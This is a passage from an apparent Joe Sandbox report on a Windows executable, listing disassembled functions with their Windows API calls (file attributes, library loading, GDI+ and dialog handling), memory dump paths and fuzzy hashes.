                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocAllocate_free
                                                            • String ID:
                                                            • API String ID: 2447670028-0
                                                            • Opcode ID: bb5443786fff4be423bfeb92490b2cffff0f71f497164962a0903c5dac2c77f9
                                                            • Instruction ID: 895f5a00e0155c8c0cfadd427360dbab2312d432240ebffa8ca651ba5fb7e501
                                                            • Opcode Fuzzy Hash: bb5443786fff4be423bfeb92490b2cffff0f71f497164962a0903c5dac2c77f9
                                                            • Instruction Fuzzy Hash: 76F0AF2230191066DB21BA26AC01BAF279BDFC3B70B154116F807B6192EA249E018D63
                                                            Function 00052396 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 000523A3
                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 000523AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1231390398-0
                                                            • Opcode ID: 4b9281331909d90407c0457becb89eb3320febc85ddf31955bc6a4ec81fad327
                                                            • Instruction ID: 5051ac67b46b6d124152d8adad88f10638bcd1263f0f893d03de5c8b455c05c6
                                                            • Opcode Fuzzy Hash: 4b9281331909d90407c0457becb89eb3320febc85ddf31955bc6a4ec81fad327
                                                            • Instruction Fuzzy Hash: 2BE09A32F0010AA7DF098BA49C099EB76ECEF552463248179A903F3100EA7CDE4946A0
                                                            Function 0004B8C6 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0004B595,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B8DA
                                                              • Part of subcall function 0004CF12: _wcslen.LIBCMT ref: 0004CF36
                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004B595,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B90B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: e3f1084ca5132c5e1e32ad41c551aa558adec2c2afb10362fc9c39f328725dc5
                                                            • Instruction ID: c125f5aec77946880916beb81affa90a3f37515f0ecaa64497a937fe61023c64
                                                            • Opcode Fuzzy Hash: e3f1084ca5132c5e1e32ad41c551aa558adec2c2afb10362fc9c39f328725dc5
                                                            • Instruction Fuzzy Hash: 5AF0A03150010AABEF015FA0CC01FDA37ADBB043C5F048060BA44D6161DB35CEA4AA60
                                                            Function 0004B450 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(?,00000000,?,0004A416,?,?,?,?,0004890B,?,?,?,0007365F,000000FF), ref: 0004B461
                                                              • Part of subcall function 0004CF12: _wcslen.LIBCMT ref: 0004CF36
                                                            • DeleteFileW.KERNEL32(?,?,?,00000800,?,0004A416,?,?,?,?,0004890B,?,?,?,0007365F,000000FF), ref: 0004B48F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: DeleteFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2643169976-0
                                                            • Opcode ID: c212d09911d7032b8a373da6c0f0d00d3e24ea6eabe86c4f3430e9eb7274e223
                                                            • Instruction ID: 3344d62a44ce5daf289281c2107f88530134748f9ee8594187a745d67673a055
                                                            • Opcode Fuzzy Hash: c212d09911d7032b8a373da6c0f0d00d3e24ea6eabe86c4f3430e9eb7274e223
                                                            • Instruction Fuzzy Hash: 3EE092B65402096BEB019BA0CC45FEA379CBB083C2F484031B949D60A2EB78DDD99A54
                                                            Function 0005BD51 Relevance: 3.0, APIs: 2, Instructions: 26comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,0007365F,000000FF), ref: 0005BD85
                                                            • OleUninitialize.OLE32(?,?,?,?,0007365F,000000FF), ref: 0005BD8A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: GdiplusShutdownUninitialize
                                                            • String ID:
                                                            • API String ID: 3856339756-0
                                                            • Opcode ID: ffd8b212752e7eb746e9094c546042f63db36b0bd976b8594bca7c323086bc92
                                                            • Instruction ID: 0ce21de89c260115aebb5b404d0becfd359971c0bcdf461a16f782db8fe775ba
                                                            • Opcode Fuzzy Hash: ffd8b212752e7eb746e9094c546042f63db36b0bd976b8594bca7c323086bc92
                                                            • Instruction Fuzzy Hash: 87E06572604A50EFE7019B5CDC05B59FBA8FB89B20F044326B51593761CB7C6841CA94
                                                            Function 0004B4B3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,0004B4AA,?,00048022,?), ref: 0004B4C4
                                                              • Part of subcall function 0004CF12: _wcslen.LIBCMT ref: 0004CF36
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,0004B4AA,?,00048022,?), ref: 0004B4F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: fc431af5e10faebbccb4da55e177db8332d94ef5c4330eab6bac50575deac4e8
                                                            • Instruction ID: 46bccd841cecefc4588b4316782c2e13259a7665e66a7f1db47811e06d976a90
                                                            • Opcode Fuzzy Hash: fc431af5e10faebbccb4da55e177db8332d94ef5c4330eab6bac50575deac4e8
                                                            • Instruction Fuzzy Hash: 58E0617150021897DB10A764DC04BE9379CFB483E1F000170FE55E71D1D738CD8086D0
                                                            Function 0005EE82 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 0005EEAC
                                                              • Part of subcall function 00044A00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A13
                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 0005EEC3
                                                              • Part of subcall function 0005C5F8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005C609
                                                              • Part of subcall function 0005C5F8: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005C61A
                                                              • Part of subcall function 0005C5F8: IsDialogMessageW.USER32(0001046C,?), ref: 0005C62E
                                                              • Part of subcall function 0005C5F8: TranslateMessage.USER32(?), ref: 0005C63C
                                                              • Part of subcall function 0005C5F8: DispatchMessageW.USER32(?), ref: 0005C646
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                            • String ID:
                                                            • API String ID: 2718869927-0
                                                            • Opcode ID: 7f561f14216d45ee279a876cb3e708e2690291838e0327264be4e835a76004b6
                                                            • Instruction ID: 45290eff646dec839c927f18539c312a328d580265a2ccadaeb8b92ac7742875
                                                            • Opcode Fuzzy Hash: 7f561f14216d45ee279a876cb3e708e2690291838e0327264be4e835a76004b6
                                                            • Instruction Fuzzy Hash: FCE0D1F550434926FF016761EC0AFFF366C6B0638AF040071B641970B3D67CDA548B66
                                                            Function 00051B14 Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00051B2F
                                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00050613,Crypt32.dll,00000000,0005068D,00000200,?,00050670,00000000,00000000,?), ref: 00051B51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1175261203-0
                                                            • Opcode ID: 75482fd34c958742159fff0b386dfac3e408c0846f5aa2d7020666718152a0c5
                                                            • Instruction ID: 68715f99e48374c50144ba73876de4f75064fbee3d5784e7dc5d17c659c5de70
                                                            • Opcode Fuzzy Hash: 75482fd34c958742159fff0b386dfac3e408c0846f5aa2d7020666718152a0c5
                                                            • Instruction Fuzzy Hash: 62E048769002186ADB11A794DC45FDB77ACEF0D3C2F044065BA49E3055E778DA84CBF0
                                                            Function 0005B398 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0005B3B9
                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0005B3C0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: BitmapCreateFromGdipStream
                                                            • String ID:
                                                            • API String ID: 1918208029-0
                                                            • Opcode ID: ee9376bf30b49aa72c99e32b6d4a86a26493b8070c9fb86bf33059e5d90acf44
                                                            • Instruction ID: c36560054e15a16e34b19858cb8b91ba53688bacf73486681ff9acade31a73a5
                                                            • Opcode Fuzzy Hash: ee9376bf30b49aa72c99e32b6d4a86a26493b8070c9fb86bf33059e5d90acf44
                                                            • Instruction Fuzzy Hash: 26E0ED71904618EBDB50EF94C9457DEBBF8EF04352F20806AE955A3601D3B8AF089B51
                                                            Function 00063B6C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00063B8A
                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00063B95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 1660781231-0
                                                            • Opcode ID: 2a915c2c83fd249c1dabda9805c8640d5807bc097a449518adb780a9e13513f9
                                                            • Instruction ID: f3479b7392960c7cf447b6618eb1d9d037700ea8a1962c9add1d808d41eba7aa
                                                            • Opcode Fuzzy Hash: 2a915c2c83fd249c1dabda9805c8640d5807bc097a449518adb780a9e13513f9
                                                            • Instruction Fuzzy Hash: C1D0A97980870004DCA026B02902589238B6B227B1BA0224AE3208A2C3EB2482482192
                                                            Function 000412D1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ItemShowWindow
                                                            • String ID:
                                                            • API String ID: 3351165006-0
                                                            • Opcode ID: 27cb43cc082284d0e435d64474fabc71d7f966277b2cc40de97111e88a6d96bc
                                                            • Instruction ID: 5fed088f87f61b588d920ac40395247cddbea14c3d87fead628b33373878eee0
                                                            • Opcode Fuzzy Hash: 27cb43cc082284d0e435d64474fabc71d7f966277b2cc40de97111e88a6d96bc
                                                            • Instruction Fuzzy Hash: 9AC01232058A00BEDB010BB0DC09E3FBBA8BBA6212F08C908B0A5C0060C23CC010DB11
                                                            Function 00041AD3 Relevance: 1.8, APIs: 1, Instructions: 319COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 94130368e104661ee04ad00f5cb4d4f5e62a600ddf540efea9f7523b729ee2c7
                                                            • Instruction ID: a87666aeae78c42712d3998d2a249b3baf69639b59aa155fa6bf3a4d32a8ef92
                                                            • Opcode Fuzzy Hash: 94130368e104661ee04ad00f5cb4d4f5e62a600ddf540efea9f7523b729ee2c7
                                                            • Instruction Fuzzy Hash: 38C1CFB4A406549FDF25CF28C8D47ED3BE5AF0A311F0801B9EC069B296CB3499C5CB69
                                                            Function 000442DA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 46442be3da082275c802101f245ccb5af436cf656ecc137a9129f0e2a37e89de
                                                            • Instruction ID: 5fdeb2fc9766d72eda4509bfbbf8a5b502a53470bcfdf5c369bb0c288c8e1a10
                                                            • Opcode Fuzzy Hash: 46442be3da082275c802101f245ccb5af436cf656ecc137a9129f0e2a37e89de
                                                            • Instruction Fuzzy Hash: 87719FF1504B859FCB25EF74C851AEBB7E9BF45300F04097EA6AB83182DB716648CB19
                                                            Function 00049082 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00049087
                                                              • Part of subcall function 000413F8: __EH_prolog.LIBCMT ref: 000413FD
                                                              • Part of subcall function 00042032: __EH_prolog.LIBCMT ref: 00042037
                                                              • Part of subcall function 0004B946: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0004B971
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$CloseFind
                                                            • String ID:
                                                            • API String ID: 2506663941-0
                                                            • Opcode ID: 8c3e9f9b2d171cda432fe8757b193b05ea09405954682b489577c7bfc23bc515
                                                            • Instruction ID: c71059cf478ac1c953d550f497d79e9ade226ef62aa611f7639d75ec53147523
                                                            • Opcode Fuzzy Hash: 8c3e9f9b2d171cda432fe8757b193b05ea09405954682b489577c7bfc23bc515
                                                            • Instruction Fuzzy Hash: D24172B19042585ADB25EB60C899BEB73B9AF54300F4404FAE58A97093DB756F88CF14
                                                            Function 000413FD Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000413FD
                                                              • Part of subcall function 00046871: __EH_prolog.LIBCMT ref: 00046876
                                                              • Part of subcall function 0004E278: __EH_prolog.LIBCMT ref: 0004E27D
                                                              • Part of subcall function 0004642D: __EH_prolog.LIBCMT ref: 00046432
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: efceef186830c9799089db202f5c5e059d5153e6d283986a39cb0c01b1ae59c1
                                                            • Instruction ID: c2519dc718fbd6791279119a1c3e673a92fe4cca085f984a287d43adb92bbb0c
                                                            • Opcode Fuzzy Hash: efceef186830c9799089db202f5c5e059d5153e6d283986a39cb0c01b1ae59c1
                                                            • Instruction Fuzzy Hash: A45148B1906B80CECB04DF6998812D97BE5AF5A301F0802BEEC4DCF69BD7755254CB22
                                                            Function 000413F8 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000413FD
                                                              • Part of subcall function 00046871: __EH_prolog.LIBCMT ref: 00046876
                                                              • Part of subcall function 0004E278: __EH_prolog.LIBCMT ref: 0004E27D
                                                              • Part of subcall function 0004642D: __EH_prolog.LIBCMT ref: 00046432
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: a742d0c1426762dd96bf11f98b695f11e710d2d20d81d84a97a5ee55b493996d
                                                            • Instruction ID: 32dd718a25886d1327acd97928c0c0bd7a9abec8124dc998077fc00e5d93d4eb
                                                            • Opcode Fuzzy Hash: a742d0c1426762dd96bf11f98b695f11e710d2d20d81d84a97a5ee55b493996d
                                                            • Instruction Fuzzy Hash: 905147B1906B80CEDB04DF6998812D97BE5AF5A301F0802BEEC4DCF68BD7755255CB22
                                                            Function 0005477D Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
